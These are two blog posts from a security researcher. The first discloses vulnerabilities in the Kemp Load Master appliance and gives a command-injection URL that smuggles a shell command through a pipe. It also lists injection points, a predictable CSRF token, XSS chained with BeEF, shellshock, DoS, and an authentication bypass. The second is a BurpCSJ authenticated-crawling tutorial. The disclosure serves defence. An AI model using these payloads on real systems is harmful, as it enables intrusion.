Wednesday, 1 April 2015

Playing with Kemp Load Master

Vote on Hacker News Share

Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download

By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks.

The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later).

Change logs of the fixed issues can be found at the following page:

"PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288".

Remote Code Execution - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288

An interesting remote code execution vector can be found through the attack payload below:

http://x.x.x.x/progs/fwaccess/add/1|command

The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests.

The main page "fwaccess" executes the following function:

[snip] from /usr/wui/progs/fwaccess



We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called.

The seterrmsg function is defined in /usr/wui/progs/util.sh and it is shown below:


On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information:

http://x.x.x.x/progs/fwaccess/add/1'ls

Response:

HTTP/1.1 200 OK
Date: Sat, 27 Dec 2014 23:25:55 GMT
Server: mini-http/1.0 (unix)
Connection: close
Content-Type: text/html
/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `''
/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file

line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator.

By attempting the request below, it is possible to achieve code execution:

http://x.x.x.x/progs/fwaccess/add/1|ls

Response:


Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command.

The application is flawed in so many other points, also, via HTTP POST requests, as shown below:



Other injection points that were found:

Page: /progs/geoctrl/doadd
Method: POST
Parameter: fqdn

Page: /progs/networks/hostname
Method: POST
Parameter: host

Page: /progs/networks/servadd
Method: POST
Parameter: addr

Page: /progs/useradmin/setopts
Method: POST
Parameter: xuser

So how can we exploit all this goodness?

CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014

We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request.

Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request (see below):


Reflected and Stored XSS - status: partially fixed - reported on June 2014

Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> BeEF just to achieve persistence.

Reflected XSS was found on this point:

Page: /progs/useradmin/setopts
Method: POST
Parameter: xuser

Example payload:


Stored XSS was found on the following points:

Page: /progs/geoctrl/doadd
Method: POST
Parameter: fqdn

Rendered page: /progs/geoctrl/fqdn


A further injection points:

Page: /progs/fwaccess/add/0
Method: POST
Parameter: comment

Page: /progs/doconfig/setmotd
Method: POST
Parameter:

BeEF Module

As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance.

The github pull request for the module can be found here, and below you can find a video of it in action:



For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and @antisnatchor was very quick to fix it in this case. So if you want to try it, ensure you have the latest version of BeEF installed.


Extra - bonus

Denial of Service - status: unknown - reported on June 2014

It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master.

Shell-shock - status: unknown - reported in 2015

Obviously, the application is not immune from the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment has been removed shortly after).

For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well.



Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-)

If you are keen for an extra-extra bonus, keep reading...

Extra - extra bonus:

No license, no web authentication

If you manage to invalidate your license, you will be prompted to a page such as the one below:



However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-)

Hope you enjoyed the post - I am sure there are other vulnerabilities in this product. If you find them, please let me know.

Friday, 29 August 2014

BurpCSJ - Dealing with authentication

Vote on Hacker News Share
I have received many questions on how to properly handle authentication when using BurpCSJ, so here is a short tutorial on how to properly manage authentication. If you are looking for how to use this Burp extension, here is a basic tutorial as well.

In this post, we are going to use BurpCSJ against the Altoro bank (vulnerable web application made on purpose), which is available online here: http://demo.testfire.net/

First, start clean (the reasons will be clear at the end of this tutorial):

- Start Burp;
- Start browser and configure proxy settings to work with Burp;
- Browse to target site: http://demo.testfire.net/
- Perform login: user: jsmith - password: Demo1234
- Check Burp cookie jar (under options/sessions), this should be populated with some cookies:


- Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and it is pointing to Burp and that the "Use cookie jar" option is ticked as well:



- Start/Launch BurpCSJ against target site (right-click, Send URL to crawljax option). When BurpCSJ launches Crawljax, you will notice that the first request has no "cookie" - this is normal in WebDriver and the reason why this occurs is that WebDriver needs to first initialize, so no worries.



- the second request, or third request (depending if there is a redirection) and all the subsequent requests performed by Crawljax will include the valid cookies from the cookie jar.

You are now performing an authenticated crawling session and if you check the browser managed by WebDriver, you should notice that it is using a valid authenticated session.

In case you do not follow the first two steps, you might end up having some issues and failing to run a proper authenticated crawling session. This happened to me quite few times...

Let's say that you already started the browser, logged in and then you enable proxy with Burp and then you run BurpCSJ. The issue is that Burp does not have history of the Set-Cookie directive so it will identify the cookies sent by the browser and will populate the Cookie jar by taking as a reference the parent domain only.

Below, you can see the issue by comparing the cookies in the browser and the ones in the Burp cookie jar. Can you spot the difference? ;-)

If this happens, a BurpCSJ crawling against demo.testfire.net would not use the cookies in the Burp cookie jar, as demo.testfire.net doesn't match with testfire.net. So no authenticated crawling session in this case...

So don't be lazy, if you have to restart/clean the browser time to time... ;-)

The latest Crawljax package has fixed multiple issues. I have noticed the crawler is more diligent and sticks to the target domain instead of visiting other pages from out-of-scope domains.

As usual, feedback is more than welcome and feel to contact me or raise github issues - https://github.com/malerisch/burpcsj